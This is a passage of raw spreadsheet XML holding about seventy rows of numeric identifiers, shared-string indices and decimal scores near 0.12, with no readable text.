      </c>
      <c r="C8701" s="2" t="s">
        <v>8288</v>
      </c>
      <c r="D8701" s="2">
        <v>1.0</v>
      </c>
      <c r="E8701" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8701" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8702" ht="15.75" customHeight="1">
      <c r="A8702" s="1">
        <v>23227.0</v>
      </c>
      <c r="B8702" s="2">
        <v>5.2854253E7</v>
      </c>
      <c r="C8702" s="2" t="s">
        <v>8289</v>
      </c>
      <c r="D8702" s="2">
        <v>1.0</v>
      </c>
      <c r="E8702" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8702" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8703" ht="15.75" customHeight="1">
      <c r="A8703" s="1">
        <v>24012.0</v>
      </c>
      <c r="B8703" s="2">
        <v>9290234.0</v>
      </c>
      <c r="C8703" s="2" t="s">
        <v>8290</v>
      </c>
      <c r="D8703" s="2">
        <v>1.0</v>
      </c>
      <c r="E8703" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8703" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8704" ht="15.75" customHeight="1">
      <c r="A8704" s="1">
        <v>24835.0</v>
      </c>
      <c r="B8704" s="2">
        <v>1.2158018E7</v>
      </c>
      <c r="C8704" s="2" t="s">
        <v>1001</v>
      </c>
      <c r="D8704" s="2">
        <v>1.0</v>
      </c>
      <c r="E8704" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8704" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8705" ht="15.75" customHeight="1">
      <c r="A8705" s="1">
        <v>25093.0</v>
      </c>
      <c r="B8705" s="2">
        <v>1.2919192E7</v>
      </c>
      <c r="C8705" s="2" t="s">
        <v>8291</v>
      </c>
      <c r="D8705" s="2">
        <v>1.0</v>
      </c>
      <c r="E8705" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8705" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8706" ht="15.75" customHeight="1">
      <c r="A8706" s="1">
        <v>25804.0</v>
      </c>
      <c r="B8706" s="2">
        <v>1.4729141E7</v>
      </c>
      <c r="C8706" s="2" t="s">
        <v>8292</v>
      </c>
      <c r="D8706" s="2">
        <v>1.0</v>
      </c>
      <c r="E8706" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8706" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8707" ht="15.75" customHeight="1">
      <c r="A8707" s="1">
        <v>26224.0</v>
      </c>
      <c r="B8707" s="2">
        <v>1.6275905E7</v>
      </c>
      <c r="C8707" s="2" t="s">
        <v>8293</v>
      </c>
      <c r="D8707" s="2">
        <v>1.0</v>
      </c>
      <c r="E8707" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8707" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8708" ht="15.75" customHeight="1">
      <c r="A8708" s="1">
        <v>29601.0</v>
      </c>
      <c r="B8708" s="2">
        <v>3.3567932E7</v>
      </c>
      <c r="C8708" s="2" t="s">
        <v>8294</v>
      </c>
      <c r="D8708" s="2">
        <v>1.0</v>
      </c>
      <c r="E8708" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8708" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8709" ht="15.75" customHeight="1">
      <c r="A8709" s="1">
        <v>32277.0</v>
      </c>
      <c r="B8709" s="2">
        <v>5534375.0</v>
      </c>
      <c r="C8709" s="2" t="s">
        <v>8295</v>
      </c>
      <c r="D8709" s="2">
        <v>1.0</v>
      </c>
      <c r="E8709" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8709" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8710" ht="15.75" customHeight="1">
      <c r="A8710" s="1">
        <v>32806.0</v>
      </c>
      <c r="B8710" s="2">
        <v>6183771.0</v>
      </c>
      <c r="C8710" s="2" t="s">
        <v>8296</v>
      </c>
      <c r="D8710" s="2">
        <v>1.0</v>
      </c>
      <c r="E8710" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8710" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8711" ht="15.75" customHeight="1">
      <c r="A8711" s="1">
        <v>34192.0</v>
      </c>
      <c r="B8711" s="2">
        <v>9962168.0</v>
      </c>
      <c r="C8711" s="2" t="s">
        <v>8297</v>
      </c>
      <c r="D8711" s="2">
        <v>1.0</v>
      </c>
      <c r="E8711" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8711" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="8712" ht="15.75" customHeight="1">
      <c r="A8712" s="1">
        <v>9916.0</v>
      </c>
      <c r="B8712" s="2">
        <v>5.6801868E7</v>
      </c>
      <c r="C8712" s="2" t="s">
        <v>8298</v>
      </c>
      <c r="D8712" s="2">
        <v>1.0</v>
      </c>
      <c r="E8712" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8712" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="8713" ht="15.75" customHeight="1">
      <c r="A8713" s="1">
        <v>18152.0</v>
      </c>
      <c r="B8713" s="2">
        <v>5.1862084E7</v>
      </c>
      <c r="C8713" s="2" t="s">
        <v>8299</v>
      </c>
      <c r="D8713" s="2">
        <v>1.0</v>
      </c>
      <c r="E8713" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8713" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="8714" ht="15.75" customHeight="1">
      <c r="A8714" s="1">
        <v>19026.0</v>
      </c>
      <c r="B8714" s="2">
        <v>5.4552554E7</v>
      </c>
      <c r="C8714" s="2" t="s">
        <v>8300</v>
      </c>
      <c r="D8714" s="2">
        <v>1.0</v>
      </c>
      <c r="E8714" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8714" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="8715" ht="15.75" customHeight="1">
      <c r="A8715" s="1">
        <v>11642.0</v>
      </c>
      <c r="B8715" s="2">
        <v>2.3214069E7</v>
      </c>
      <c r="C8715" s="2" t="s">
        <v>8301</v>
      </c>
      <c r="D8715" s="2">
        <v>1.0</v>
      </c>
      <c r="E8715" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8715" s="2">
        <v>0.121141975308642</v>
      </c>
    </row>
    <row r="8716" ht="15.75" customHeight="1">
      <c r="A8716" s="1">
        <v>32959.0</v>
      </c>
      <c r="B8716" s="2">
        <v>6514706.0</v>
      </c>
      <c r="C8716" s="2" t="s">
        <v>8141</v>
      </c>
      <c r="D8716" s="2">
        <v>1.0</v>
      </c>
      <c r="E8716" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8716" s="2">
        <v>0.1211293260473588</v>
      </c>
    </row>
    <row r="8717" ht="15.75" customHeight="1">
      <c r="A8717" s="1">
        <v>8057.0</v>
      </c>
      <c r="B8717" s="2">
        <v>5.29152E7</v>
      </c>
      <c r="C8717" s="2" t="s">
        <v>8302</v>
      </c>
      <c r="D8717" s="2">
        <v>1.0</v>
      </c>
      <c r="E8717" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8717" s="2">
        <v>0.1209677419354839</v>
      </c>
    </row>
    <row r="8718" ht="15.75" customHeight="1">
      <c r="A8718" s="1">
        <v>15911.0</v>
      </c>
      <c r="B8718" s="2">
        <v>4.4651527E7</v>
      </c>
      <c r="C8718" s="2" t="s">
        <v>8303</v>
      </c>
      <c r="D8718" s="2">
        <v>1.0</v>
      </c>
      <c r="E8718" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8718" s="2">
        <v>0.1209677419354839</v>
      </c>
    </row>
    <row r="8719" ht="15.75" customHeight="1">
      <c r="A8719" s="1">
        <v>30261.0</v>
      </c>
      <c r="B8719" s="2">
        <v>3.7623189E7</v>
      </c>
      <c r="C8719" s="2" t="s">
        <v>8304</v>
      </c>
      <c r="D8719" s="2">
        <v>1.0</v>
      </c>
      <c r="E8719" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8719" s="2">
        <v>0.1208112874779542</v>
      </c>
    </row>
    <row r="8720" ht="15.75" customHeight="1">
      <c r="A8720" s="1">
        <v>7857.0</v>
      </c>
      <c r="B8720" s="2">
        <v>5.2361539E7</v>
      </c>
      <c r="C8720" s="2" t="s">
        <v>8305</v>
      </c>
      <c r="D8720" s="2">
        <v>1.0</v>
      </c>
      <c r="E8720" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8720" s="2">
        <v>0.120545073375262</v>
      </c>
    </row>
    <row r="8721" ht="15.75" customHeight="1">
      <c r="A8721" s="1">
        <v>14492.0</v>
      </c>
      <c r="B8721" s="2">
        <v>3.9626189E7</v>
      </c>
      <c r="C8721" s="2" t="s">
        <v>8306</v>
      </c>
      <c r="D8721" s="2">
        <v>1.0</v>
      </c>
      <c r="E8721" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8721" s="2">
        <v>0.120545073375262</v>
      </c>
    </row>
    <row r="8722" ht="15.75" customHeight="1">
      <c r="A8722" s="1">
        <v>4320.0</v>
      </c>
      <c r="B8722" s="2">
        <v>4.2030971E7</v>
      </c>
      <c r="C8722" s="2" t="s">
        <v>8307</v>
      </c>
      <c r="D8722" s="2">
        <v>1.0</v>
      </c>
      <c r="E8722" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8722" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="8723" ht="15.75" customHeight="1">
      <c r="A8723" s="1">
        <v>12436.0</v>
      </c>
      <c r="B8723" s="2">
        <v>2.9233025E7</v>
      </c>
      <c r="C8723" s="2" t="s">
        <v>8308</v>
      </c>
      <c r="D8723" s="2">
        <v>1.0</v>
      </c>
      <c r="E8723" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8723" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="8724" ht="15.75" customHeight="1">
      <c r="A8724" s="1">
        <v>18562.0</v>
      </c>
      <c r="B8724" s="2">
        <v>5.3177373E7</v>
      </c>
      <c r="C8724" s="2" t="s">
        <v>8309</v>
      </c>
      <c r="D8724" s="2">
        <v>1.0</v>
      </c>
      <c r="E8724" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8724" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="8725" ht="15.75" customHeight="1">
      <c r="A8725" s="1">
        <v>20739.0</v>
      </c>
      <c r="B8725" s="2">
        <v>1.4768342E7</v>
      </c>
      <c r="C8725" s="2" t="s">
        <v>8310</v>
      </c>
      <c r="D8725" s="2">
        <v>1.0</v>
      </c>
      <c r="E8725" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8725" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="8726" ht="15.75" customHeight="1">
      <c r="A8726" s="1">
        <v>7489.0</v>
      </c>
      <c r="B8726" s="2">
        <v>5.1375017E7</v>
      </c>
      <c r="C8726" s="2" t="s">
        <v>8311</v>
      </c>
      <c r="D8726" s="2">
        <v>1.0</v>
      </c>
      <c r="E8726" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8726" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="8727" ht="15.75" customHeight="1">
      <c r="A8727" s="1">
        <v>7587.0</v>
      </c>
      <c r="B8727" s="2">
        <v>5.1596217E7</v>
      </c>
      <c r="C8727" s="2" t="s">
        <v>8312</v>
      </c>
      <c r="D8727" s="2">
        <v>1.0</v>
      </c>
      <c r="E8727" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8727" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="8728" ht="15.75" customHeight="1">
      <c r="A8728" s="1">
        <v>13154.0</v>
      </c>
      <c r="B8728" s="2">
        <v>3.3822296E7</v>
      </c>
      <c r="C8728" s="2" t="s">
        <v>8313</v>
      </c>
      <c r="D8728" s="2">
        <v>1.0</v>
      </c>
      <c r="E8728" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8728" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="8729" ht="15.75" customHeight="1">
      <c r="A8729" s="1">
        <v>10042.0</v>
      </c>
      <c r="B8729" s="2">
        <v>5.7078364E7</v>
      </c>
      <c r="C8729" s="2" t="s">
        <v>8314</v>
      </c>
      <c r="D8729" s="2">
        <v>1.0</v>
      </c>
      <c r="E8729" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8729" s="2">
        <v>0.1200980392156863</v>
      </c>
    </row>
    <row r="8730" ht="15.75" customHeight="1">
      <c r="A8730" s="1">
        <v>130.0</v>
      </c>
      <c r="B8730" s="2">
        <v>1.3219792E7</v>
      </c>
      <c r="C8730" s="2" t="s">
        <v>8315</v>
      </c>
      <c r="D8730" s="2">
        <v>1.0</v>
      </c>
      <c r="E8730" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8730" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="8731" ht="15.75" customHeight="1">
      <c r="A8731" s="1">
        <v>6799.0</v>
      </c>
      <c r="B8731" s="2">
        <v>4.9517894E7</v>
      </c>
      <c r="C8731" s="2" t="s">
        <v>8316</v>
      </c>
      <c r="D8731" s="2">
        <v>1.0</v>
      </c>
      <c r="E8731" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8731" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="8732" ht="15.75" customHeight="1">
      <c r="A8732" s="1">
        <v>9638.0</v>
      </c>
      <c r="B8732" s="2">
        <v>5.6236698E7</v>
      </c>
      <c r="C8732" s="2" t="s">
        <v>8317</v>
      </c>
      <c r="D8732" s="2">
        <v>1.0</v>
      </c>
      <c r="E8732" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8732" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="8733" ht="15.75" customHeight="1">
      <c r="A8733" s="1">
        <v>702.0</v>
      </c>
      <c r="B8733" s="2">
        <v>2.0470626E7</v>
      </c>
      <c r="C8733" s="2" t="s">
        <v>8318</v>
      </c>
      <c r="D8733" s="2">
        <v>1.0</v>
      </c>
      <c r="E8733" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8733" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="8734" ht="15.75" customHeight="1">
      <c r="A8734" s="1">
        <v>2660.0</v>
      </c>
      <c r="B8734" s="2">
        <v>3.4699121E7</v>
      </c>
      <c r="C8734" s="2" t="s">
        <v>8319</v>
      </c>
      <c r="D8734" s="2">
        <v>1.0</v>
      </c>
      <c r="E8734" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8734" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="8735" ht="15.75" customHeight="1">
      <c r="A8735" s="1">
        <v>6462.0</v>
      </c>
      <c r="B8735" s="2">
        <v>4.8633527E7</v>
      </c>
      <c r="C8735" s="2" t="s">
        <v>8320</v>
      </c>
      <c r="D8735" s="2">
        <v>1.0</v>
      </c>
      <c r="E8735" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8735" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="8736" ht="15.75" customHeight="1">
      <c r="A8736" s="1">
        <v>9088.0</v>
      </c>
      <c r="B8736" s="2">
        <v>5.5139767E7</v>
      </c>
      <c r="C8736" s="2" t="s">
        <v>8321</v>
      </c>
      <c r="D8736" s="2">
        <v>1.0</v>
      </c>
      <c r="E8736" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8736" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="8737" ht="15.75" customHeight="1">
      <c r="A8737" s="1">
        <v>16071.0</v>
      </c>
      <c r="B8737" s="2">
        <v>4.5318848E7</v>
      </c>
      <c r="C8737" s="2" t="s">
        <v>8322</v>
      </c>
      <c r="D8737" s="2">
        <v>1.0</v>
      </c>
      <c r="E8737" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8737" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="8738" ht="15.75" customHeight="1">
      <c r="A8738" s="1">
        <v>14992.0</v>
      </c>
      <c r="B8738" s="2">
        <v>4.1419215E7</v>
      </c>
      <c r="C8738" s="2" t="s">
        <v>8323</v>
      </c>
      <c r="D8738" s="2">
        <v>1.0</v>
      </c>
      <c r="E8738" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8738" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="8739" ht="15.75" customHeight="1">
      <c r="A8739" s="1">
        <v>22827.0</v>
      </c>
      <c r="B8739" s="2">
        <v>4.6384383E7</v>
      </c>
      <c r="C8739" s="2" t="s">
        <v>8324</v>
      </c>
      <c r="D8739" s="2">
        <v>1.0</v>
      </c>
      <c r="E8739" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8739" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="8740" ht="15.75" customHeight="1">
      <c r="A8740" s="1">
        <v>26383.0</v>
      </c>
      <c r="B8740" s="2">
        <v>1.6999988E7</v>
      </c>
      <c r="C8740" s="2" t="s">
        <v>8325</v>
      </c>
      <c r="D8740" s="2">
        <v>1.0</v>
      </c>
      <c r="E8740" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8740" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="8741" ht="15.75" customHeight="1">
      <c r="A8741" s="1">
        <v>31332.0</v>
      </c>
      <c r="B8741" s="2">
        <v>4.9746252E7</v>
      </c>
      <c r="C8741" s="2" t="s">
        <v>8326</v>
      </c>
      <c r="D8741" s="2">
        <v>1.0</v>
      </c>
      <c r="E8741" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8741" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="8742" ht="15.75" customHeight="1">
      <c r="A8742" s="1">
        <v>3984.0</v>
      </c>
      <c r="B8742" s="2">
        <v>4.0838128E7</v>
      </c>
      <c r="C8742" s="2" t="s">
        <v>8327</v>
      </c>
      <c r="D8742" s="2">
        <v>1.0</v>
      </c>
      <c r="E8742" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8742" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="8743" ht="15.75" customHeight="1">
      <c r="A8743" s="1">
        <v>8072.0</v>
      </c>
      <c r="B8743" s="2">
        <v>5.2985542E7</v>
      </c>
      <c r="C8743" s="2" t="s">
        <v>8328</v>
      </c>
      <c r="D8743" s="2">
        <v>1.0</v>
      </c>
      <c r="E8743" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8743" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="8744" ht="15.75" customHeight="1">
      <c r="A8744" s="1">
        <v>1879.0</v>
      </c>
      <c r="B8744" s="2">
        <v>2.9683005E7</v>
      </c>
      <c r="C8744" s="2" t="s">
        <v>8329</v>
      </c>
      <c r="D8744" s="2">
        <v>1.0</v>
      </c>
      <c r="E8744" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8744" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="8745" ht="15.75" customHeight="1">
      <c r="A8745" s="1">
        <v>5039.0</v>
      </c>
      <c r="B8745" s="2">
        <v>4.4290926E7</v>
      </c>
      <c r="C8745" s="2" t="s">
        <v>8330</v>
      </c>
      <c r="D8745" s="2">
        <v>1.0</v>
      </c>
      <c r="E8745" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8745" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="8746" ht="15.75" customHeight="1">
      <c r="A8746" s="1">
        <v>12393.0</v>
      </c>
      <c r="B8746" s="2">
        <v>2.8918542E7</v>
      </c>
      <c r="C8746" s="2" t="s">
        <v>8331</v>
      </c>
      <c r="D8746" s="2">
        <v>1.0</v>
      </c>
      <c r="E8746" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8746" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="8747" ht="15.75" customHeight="1">
      <c r="A8747" s="1">
        <v>20212.0</v>
      </c>
      <c r="B8747" s="2">
        <v>1.0704297E7</v>
      </c>
      <c r="C8747" s="2" t="s">
        <v>8332</v>
      </c>
      <c r="D8747" s="2">
        <v>1.0</v>
      </c>
      <c r="E8747" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8747" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="8748" ht="15.75" customHeight="1">
      <c r="A8748" s="1">
        <v>29231.0</v>
      </c>
      <c r="B8748" s="2">
        <v>3.0832667E7</v>
      </c>
      <c r="C8748" s="2" t="s">
        <v>8333</v>
      </c>
      <c r="D8748" s="2">
        <v>1.0</v>
      </c>
      <c r="E8748" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8748" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="8749" ht="15.75" customHeight="1">
      <c r="A8749" s="1">
        <v>29265.0</v>
      </c>
      <c r="B8749" s="2">
        <v>3.099106E7</v>
      </c>
      <c r="C8749" s="2" t="s">
        <v>8334</v>
      </c>
      <c r="D8749" s="2">
        <v>1.0</v>
      </c>
      <c r="E8749" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8749" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="8750" ht="15.75" customHeight="1">
      <c r="A8750" s="1">
        <v>30343.0</v>
      </c>
      <c r="B8750" s="2">
        <v>3.8206222E7</v>
      </c>
      <c r="C8750" s="2" t="s">
        <v>8335</v>
      </c>
      <c r="D8750" s="2">
        <v>1.0</v>
      </c>
      <c r="E8750" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8750" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="8751" ht="15.75" customHeight="1">
      <c r="A8751" s="1">
        <v>188.0</v>
      </c>
      <c r="B8751" s="2">
        <v>1.4287992E7</v>
      </c>
      <c r="C8751" s="2" t="s">
        <v>8336</v>
      </c>
      <c r="D8751" s="2">
        <v>1.0</v>
      </c>
      <c r="E8751" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8751" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="8752" ht="15.75" customHeight="1">
      <c r="A8752" s="1">
        <v>7691.0</v>
      </c>
      <c r="B8752" s="2">
        <v>5.1954485E7</v>
      </c>
      <c r="C8752" s="2" t="s">
        <v>8337</v>
      </c>
      <c r="D8752" s="2">
        <v>1.0</v>
      </c>
      <c r="E8752" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8752" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="8753" ht="15.75" customHeight="1">
      <c r="A8753" s="1">
        <v>7739.0</v>
      </c>
      <c r="B8753" s="2">
        <v>5.204867E7</v>
      </c>
      <c r="C8753" s="2" t="s">
        <v>8338</v>
      </c>
      <c r="D8753" s="2">
        <v>1.0</v>
      </c>
      <c r="E8753" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8753" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="8754" ht="15.75" customHeight="1">
      <c r="A8754" s="1">
        <v>8558.0</v>
      </c>
      <c r="B8754" s="2">
        <v>5.4170392E7</v>
      </c>
      <c r="C8754" s="2" t="s">
        <v>8339</v>
      </c>
      <c r="D8754" s="2">
        <v>1.0</v>
      </c>
      <c r="E8754" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8754" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="8755" ht="15.75" customHeight="1">
      <c r="A8755" s="1">
        <v>18482.0</v>
      </c>
      <c r="B8755" s="2">
        <v>5.2889042E7</v>
      </c>
      <c r="C8755" s="2" t="s">
        <v>8340</v>
      </c>
      <c r="D8755" s="2">
        <v>1.0</v>
      </c>
      <c r="E8755" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8755" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="8756" ht="15.75" customHeight="1">
      <c r="A8756" s="1">
        <v>28797.0</v>
      </c>
      <c r="B8756" s="2">
        <v>2.8601259E7</v>
      </c>
      <c r="C8756" s="2" t="s">
        <v>8341</v>
      </c>
      <c r="D8756" s="2">
        <v>1.0</v>
      </c>
      <c r="E8756" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8756" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="8757" ht="15.75" customHeight="1">
      <c r="A8757" s="1">
        <v>30535.0</v>
      </c>
      <c r="B8757" s="2">
        <v>4.0546339E7</v>
      </c>
      <c r="C8757" s="2" t="s">
        <v>8342</v>
      </c>
      <c r="D8757" s="2">
        <v>1.0</v>
      </c>
      <c r="E8757" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8757" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="8758" ht="15.75" customHeight="1">
      <c r="A8758" s="1">
        <v>714.0</v>
      </c>
      <c r="B8758" s="2">
        <v>2.0613251E7</v>
      </c>
      <c r="C8758" s="2" t="s">
        <v>8343</v>
      </c>
      <c r="D8758" s="2">
        <v>1.0</v>
      </c>
      <c r="E8758" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8758" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="8759" ht="15.75" customHeight="1">
      <c r="A8759" s="1">
        <v>1158.0</v>
      </c>
      <c r="B8759" s="2">
        <v>2.4469445E7</v>
      </c>
      <c r="C8759" s="2" t="s">
        <v>8344</v>
      </c>
      <c r="D8759" s="2">
        <v>1.0</v>
      </c>
      <c r="E8759" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8759" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="8760" ht="15.75" customHeight="1">
      <c r="A8760" s="1">
        <v>4315.0</v>
      </c>
      <c r="B8760" s="2">
        <v>4.1996329E7</v>
      </c>
      <c r="C8760" s="2" t="s">
        <v>8345</v>
      </c>
      <c r="D8760" s="2">
        <v>1.0</v>
      </c>
      <c r="E8760" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8760" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="8761" ht="15.75" customHeight="1">
      <c r="A8761" s="1">
        <v>6910.0</v>
      </c>
      <c r="B8761" s="2">
        <v>4.9842568E7</v>
      </c>
      <c r="C8761" s="2" t="s">
        <v>8346</v>
      </c>
      <c r="D8761" s="2">
        <v>1.0</v>
      </c>
      <c r="E8761" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8761" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="8762" ht="15.75" customHeight="1">
      <c r="A8762" s="1">
        <v>8559.0</v>
      </c>
      <c r="B8762" s="2">
        <v>5.4170392E7</v>
      </c>
      <c r="C8762" s="2" t="s">
        <v>8347</v>
      </c>
      <c r="D8762" s="2">
        <v>1.0</v>
      </c>
      <c r="E8762" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8762" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="8763" ht="15.75" customHeight="1">
      <c r="A8763" s="1">
        <v>9637.0</v>
      </c>
      <c r="B8763" s="2">
        <v>5.6236698E7</v>
      </c>
      <c r="C8763" s="2" t="s">
        <v>8348</v>
      </c>
      <c r="D8763" s="2">
        <v>1.0</v>
      </c>
      <c r="E8763" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8763" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="8764" ht="15.75" customHeight="1">
      <c r="A8764" s="1">
        <v>10135.0</v>
      </c>
      <c r="B8764" s="2">
        <v>5.7297932E7</v>
      </c>
      <c r="C8764" s="2" t="s">
        <v>8349</v>
      </c>
      <c r="D8764" s="2">
        <v>1.0</v>
      </c>
      <c r="E8764" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8764" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="8765" ht="15.75" customHeight="1">
      <c r="A8765" s="1">
        <v>10356.0</v>
      </c>
      <c r="B8765" s="2">
        <v>7265870.0</v>
      </c>
      <c r="C8765" s="2" t="s">
        <v>8350</v>
      </c>
      <c r="D8765" s="2">
        <v>1.0</v>
      </c>
      <c r="E8765" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8765" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="8766" ht="15.75" customHeight="1">
      <c r="A8766" s="1">
        <v>10915.0</v>
      </c>
      <c r="B8766" s="2">
        <v>1671120.0</v>
      </c>
      <c r="C8766" s="2" t="s">
        <v>8351</v>
      </c>
      <c r="D8766" s="2">
        <v>1.0</v>
      </c>
      <c r="E8766" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8766" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="8767" ht="15.75" customHeight="1">
      <c r="A8767" s="1">
        <v>13065.0</v>
      </c>
      <c r="B8767" s="2">
        <v>3.3314597E7</v>
      </c>
      <c r="C8767" s="2" t="s">
        <v>8352</v>
      </c>
      <c r="D8767" s="2">
        <v>1.0</v>
      </c>
      <c r="E8767" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8767" s="2">
        <v>0.1194444444444444</v>
      </c>
    </row>
    <row r="8768" ht="15.75" customHeight="1">
      <c r="A8768" s="1">
        <v>13151.0</v>
      </c>
      <c r="B8768" s="2">
        <v>3.3816107E7</v>
      </c>
